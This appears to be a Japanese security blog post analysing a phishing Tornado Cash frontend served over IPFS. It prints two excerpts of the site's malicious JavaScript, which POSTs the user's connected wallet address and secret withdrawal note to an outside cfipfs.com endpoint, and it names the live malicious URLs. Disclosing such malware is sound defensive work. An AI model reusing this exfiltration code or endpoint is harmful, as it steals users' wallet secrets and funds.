発見プロセス:#
今日は tornado プロトコルを学んでいるので、利用可能な引き出しフロントエンドを検索エンジンで探しました。そして、https://ipfs.io/ipns/tornadocash-ipfs.eth/ という非常に「分散化」されたフロントエンドを見つけました。
ウェブサイトは非常に規範的に見えますが、ネットワークリクエストを確認すると、このページの JavaScript に異常な動作があることがわかりました。フロントエンドは、ユーザーの非常に機密性の高いデータを報告します。
分析:#
Chrome でコード内の報告アドレス bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4 [.] cfipfs [.] com/v1 をグローバル検索すると、非常に多くの報告コードが見つかります。ユーザーのウォレット接続、引き出しノート、引き出しアドレス、全体のプロセスの機密データを報告します。
悪意のあるコードは、edafb4b.js に保存されています。https://ipfs.io/ipns/tornadocash-ipfs.eth/_nuxt/edafb4b.js
一部の報告コードは以下のようになります:
(1 接続されたウォレットアドレスを報告する
{
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1/", {
headers: {
"content-type": "application/json; charset=UTF-8"
},
body: '{"connectedwallet": "'.concat(t, '"}'),
method: "POST"
}).then((function() {}
))
}
(2 ユーザーが生成した引き出しノートを報告する
((function() {
this.prefix,
this.note;
fetch("https://bafybeiebdyj3wuyrn32rzeq3aldsfyjsefqnmetdapjgljczkkgrizkuk4.cfipfs.com/v1", {
headers: {
"content-type": "application/json; charset=UTF-8"
},
body: '{"newdepositnote": "'.concat(this.prefix, "-").concat(this.note, '"}'),
method: "POST"
}).then((function() {}
))
}
)),
結論#
tornadocash-ipfs.eth はフィッシングサイトのフロントエンドです。